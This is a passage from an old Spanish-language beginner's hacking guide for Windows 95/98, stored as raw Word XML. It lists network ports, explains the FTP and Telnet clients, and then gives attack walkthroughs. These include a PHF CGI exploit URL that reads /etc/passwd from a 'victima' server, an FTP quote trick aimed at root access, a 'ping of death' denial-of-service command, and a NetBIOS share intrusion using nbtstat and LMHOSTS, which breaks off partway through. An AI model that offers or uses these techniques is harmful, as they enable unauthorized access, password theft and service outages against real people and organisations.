        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>este interesado en profundizar le remito a que se pille el RFC 1180 o un fichero disponible en multitud de servidores, desgraciadamente no te puede asegurar el nombre del fichero ya que lo he encontrado de varias formas</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>pero te dare el nombre que aparece al editarlo, ya que en todos es igual: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Introduction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the Internet Protocols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                       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       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Computer Science Facilities Group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                       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RUTGERS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The State University of New Jersey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 July 1987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CC608F" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">   3-1. Puertos</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>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Antes ya os he explicado muy brevemente la comunicacion del protocolo en</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">cuestion. Pues ahora os pongo una extensa lista sobre los distintos  puertos y sus servicios correspondientes.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echo                7/tcp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echo                7/udp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discard             9/tcp    sink null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discard             9/udp    sink null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systat             11/tcp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systat             11/tcp    users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daytime            13/tcp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daytime            13/udp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netstat            15/tcp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qotd               17/tcp    quote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qotd               17/udp    quote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chargen            19/tcp    ttytst source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chargen            19/udp    ttytst source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ftp-data           20/tcp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                21/tcp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telnet             23/tcp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smtp               25/tcp    mail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time               37/tcp    timserver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time               37/udp    timserver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rlp                39/udp    resource      # resource location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name               42/tcp    nameserver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name               42/udp    nameserver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whois              43/tcp    nicname       # usually to sri-nic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domain             53/tcp    nameserver    # name-domain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domain             53/udp    nameserver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nameserver         53/tcp    domain        # name-domain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nameserver         53/udp    domain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mtp                57/tcp                  # deprecated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bootp              67/udp                  # boot program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tftp               69/udp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rje                77/tcp    netrjs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finger             79/tcp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link               87/tcp    ttylink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supdup             95/tcp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hostnames         101/tcp    hostname      # usually from sri-nic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iso-tsap          102/tcp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dictionary        103/tcp    webster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x400              103/tcp                  # ISO Mail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x400-snd          104/tcp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csnet-ns          105/tcp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pop               109/tcp    postoffice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pop2              109/tcp                  # Post Office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pop3              110/tcp    postoffice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portmap           111/tcp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portmap           111/udp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sunrpc            111/tcp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sunrpc            111/udp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auth              113/tcp    authentication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sftp              115/tcp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path              117/tcp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uucp-path         117/tcp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nntp              119/tcp    usenet        # Network News Transfer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ntp               123/udp    ntpd ntp      # network time protocol (exp)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nbname            137/udp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nbdatagram        138/udp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nbsession         139/tcp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NeWS              144/tcp    news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sgmp              153/udp    sgmp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tcprepo           158/tcp    repository    # PCMAIL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snmp              161/udp    snmp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snmp-trap         162/udp    snmp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print-srv         170/tcp                  # network PostScript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vmnet             175/tcp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load              315/udp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vmnet0            400/tcp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sytek             500/udp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biff              512/udp    comsat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exec              512/tcp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login             513/tcp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who               513/udp    whod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shell             514/tcp    cmd           # no passwords used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syslog            514/udp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printer           515/tcp    spooler       # line printer spooler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talk              517/udp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ntalk             518/udp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efs               520/tcp                  # for LucasFilm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route             520/udp    router routed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timed             525/udp    timeserver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tempo             526/tcp    newdate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courier           530/tcp    rpc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conference        531/tcp    chat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rvd-control       531/udp    MIT disk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netnews           532/tcp    readnews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netwall           533/udp                 # -for emergency broadcasts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uucp              540/tcp    uucpd        # uucp daemon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klogin            543/tcp                 # Kerberos authenticated rlogin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kshell            544/tcp    cmd          # and remote shell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new-rwho          550/udp    new-who      # experimental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remotefs          556/tcp    rfs_server rfs# Brunhoff remote filesystem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rmonitor          560/udp    rmonitord     # experimental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monitor           561/udp                  # experimental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garcon            600/tcp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maitrd            601/tcp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busboy            602/tcp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acctmaster        700/udp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acctslave         701/udp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              702/udp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acctlogin         703/udp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acctprinter       704/udp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elcsd             704/udp                  # errlog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acctinfo          705/udp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acctslave2        706/udp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acctdisk          707/udp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kerberos          750/tcp    kdc          # Kerberos authentication--tcp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kerberos          750/udp    kdc          # Kerberos authentication--udp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kerberos_master   751/tcp                 # Kerberos authentication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kerberos_master   751/udp                 # Kerberos authentication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passwd_server     752/udp                 # Kerberos passwd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userreg_server    753/udp                 # Kerberos userreg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krb_prop          754/tcp                 # Kerberos slave propagation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erlogin           888/tcp                 # Login and environment passing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kpop             1109/tcp                 # Pop with Kerberos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phone            1167/udp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ingreslock       1524/tcp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maze             1666/udp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nfs              2049/udp                  # sun nfs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knetd            2053/tcp                  # Kerberos de-multiplexor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eklogin          2105/tcp                  # Kerberos encrypted rlogin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rmt              5555/tcp    rmtd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mtb              5556/tcp    mtbd          # mtb backup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man              9535/tcp                  # remote man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                9536/tcp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mantst           9537/tcp                  # remote man server, testing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bnews           10000/tcp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rscs0           10000/udp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queue           10001/tcp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rscs1           10001/udp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poker           10002/tcp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rscs2           10002/udp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gateway         10003/tcp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rscs3           10003/udp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remp            10004/tcp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rscs4           10004/udp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rscs5           10005/udp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rscs6           10006/udp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rscs7           10007/udp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rscs8           10008/udp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rscs9           10009/udp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rscsa           10010/udp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rscsb           10011/udp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qmaster         10012/tcp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qmaster         10012/udp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La verdad es que no te quejaras :) de esta lista. Si quieres mas</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>informacion sobre los puertos con su debida explicacion mirate el RFC 1060.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CC608F" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">   3-2.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Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>o sea Protocolo de Transferencia de Ficheros y como podras observar en el listado de los puertos al FTP le corresponde el 21. Este servicio hay que conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros  tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking.  Sino dispones de ningun cliente FTP, el propio win95/98 lleva incorporado</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>uno, el unico problema es que no es muy vistoso ya que funciona en modo  MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta  que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y se pondra en modo FTP. Un ejemplo seria esto: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c:\&gt;ftp   &lt;- Escribimos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ftp&gt;      &lt;- activado el modo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Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>comandos disponibles del FTP, como no viene a cuento no los explicare pero  buscando por hay podras hallar informacion de lo que hace cada cosa pero</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>lo mejor es que lo averigues tu solito.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CC608F"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3-3. Telnet?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Por suerte los usuarios de win95/98 con el telnet tienen mas suerte o menos</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> segun se mire, ya que el servico de Telnet de win95/98 que tambien esta  incorporado en el sistema, es muy facil de manejar y ademas tiene ventana  propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que  tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui  la de "sistema remoto", entonces se activara otra ventana en la que</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>nos saldra tres opciones, la primera "nombre de host" es donde queremos  conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo tenemos "tipo de terminal" que no hace falta cambiarlo. El telnet es importante ya que es asi como entramos a una cuenta en un</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>servidor y podremos hacer lo que tengamos permitido en el sistema. Logicamente entraremos en una cuenta si tenemos el login y password.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205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  4. Hacking </w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Basico En Windows?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>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Por fin ya se a acabo el latazo de la explicacion de como moverse por</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> win95/98. Ahora ya podemos empezar a jugar un poco por inet :), siempre  por puro placer pero jamas con malos fines.  En esta seccion os explicare varias maneras de hacking usando el win95/98 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pelo o sea sin utilizar ninguna herramienta externa.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CC608F"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4-1. Phf?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La primera tecnica ya es muy conocida y la verdad es que tendremos suerte</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay  que saber buscar y tener paciencia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="00205350" w:rsidRDefault="00CC608F" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00205350" w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Para que esto nos funcione solo tenemos que tener un navegador instalado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00205350" w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>en nuesto win95/98, por defecto suele venir el IE o sea que no podras decir que no tienes, siempre y cuando hallas instalado los paquetes extras.  Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00205350" w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> corra sobre unix (muchos). Conectamos con un servidor en cuestion,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00205350" w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="00205350" w:rsidRDefault="00CC608F" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>añ</w:t>
      </w:r>
      <w:r w:rsidR="00205350" w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>adimos: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http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd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Como ya he dicho si todo sale bien nos aparecera el fichero de passwords</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto</w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>el PHF tiene muchas variantes por eso te aconsejo que busce algo que profundice en esta tecnica al igual que tambien busca informacion sobre  el fichero passwd de unix para comprenderlo.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CC608F"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xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00CC608F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>4-2.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Antes ya te he explicado el funcionamiento del FTP de win95/98, ahora lo</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>usaremos para sacer el fichero de password de un servidor. Desde una  ventana del MS-DOS llamamos al programa FTP y escribimos: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ftp&gt; open victima.com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Conect to victima.com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220 victim.com FTP server ready.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ftp&gt; quote user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331 Guest login ok, send ident as password.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ftp&gt; quote cwd ~root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530 Please login with USER and PASS.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ftp&gt; quote pass ftp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230 Guest login ok, access restrictions apply.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ftp&gt; dir (o lo que querramos)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Y como siempre es el caso si todo sale bien estaremos metidos en el</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>sistema como root (en lenguaje unix significa el superusuario, o sea el que controla el servidor). Por desgracia esta tecnica es muy antigua por lo que mas seguro no funcionara pero todo es posible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="00FF7CC8"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sidRPr="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">   4-3. Ping De La Muerte?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tecnica no es propia de un Hacker sino de un Lamer (no quiero decir</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar  grandes perdidas a una empresa. Con esto solo os quiero decir que aunque</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">aqui os lo explicare no es cuestion que lo useis por Internet atacando  </w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>servidores. La utilidad Ping sirve principalmente para saber si un servidor esta activo y ademas podemos calcular el trafico en la red segun el tiempo de su respuesta. Basicamente se le envia un paquete a un servidor y este nos  contesta, solo que si se le envia un paquete muy grande puede llegar  desordenado, por lo que el servidor pide al origen que le vuelva a enviar</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> una parte o la totalidad del paquete, por lo que se produce un datagrama  del ping muy grande y producira su caida. Para ejecutar este ataque solo  tenemos que escribir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c:\&gt;ping -l 65510 victima.com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Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>de hacer tonterias leed la parte sobre seguridad de la guia.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4-4. Recursos Compartidos?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Como win95/98 NO tiene seguridad nos permite colarnos en el disco duro de</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>otra persona por Internet y lo mejor del caso es que esta tecnica nos la proporciona los propios programas del win95/98. Por supuesto no todo es tan sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala configuracion del propio usuario al no configurar adecuadamente los  recursos compartidos de su red corriendo sobre win95/98.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Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador  bien configurado, o sea el compartir recursos bien puesto y tambien tener</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>el Netbios instalado. Para configurarlo, tenemos que tener activado la opcion de "compartir ficheros e impresoras" en MIPC-&gt;Panel de Control-&gt;Red.  SI por el caso la opcion esta desactivada simplemente pulsamos el boton de  "a¤adir" y a¤adimos el servicio "Compartir ficheros e impresoras en redes  Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"  en "Cliente para redes Microsoft". Tambien tiene que estar activado el  "Cliente para redes Microsoft", que viene por defecto en MIPC-&gt;Acceso  Telefonico a Redes-&gt;Conexion a Inet que usaremos-&gt;boton derecho-&gt;  propiedades, debiendo estar activada la casilla "conectarse a la red".   Ahora ya podemos ponernos manos a la obra, entonces volvemos a una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ventana del MS-DOS y ejecutamos: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c:\&gt;nbtstat -A (IP DE LA VICTIMA)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NetBIOS Remote Machine Name Table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Name               Type         Status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VICTIMAMACHINE    &lt;00&gt;    UNIQUE     Registered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VICTIMAGROUP      &lt;00&gt;    GROUP      Registered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VICTIMAMACHINE    &lt;03&gt;    UNIQUE     Registered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VICTIMAMACHINE    &lt;20&gt;    UNIQUE     Registered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VICTIMAGROUP      &lt;1E&gt;    GROUP      Registered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MAC Address = 44-45-53-54-00-00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Cuando ejecutamos este comando nos saldra una tabla como esta y el  primer 'UNIQUE' de tipo &lt;00&gt; es el nombre de la victima y como puedes  ver la maquina se llama VICTIMAMACHINE.   Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso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encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP  y el nombre de la maquina en cuestion, esto seria de la siguiente forma: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c:\&gt;edit c:\windows\system32\LMHOSTS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VICTIMAMACHINE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Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos  un comando para a¤adir el ordenador 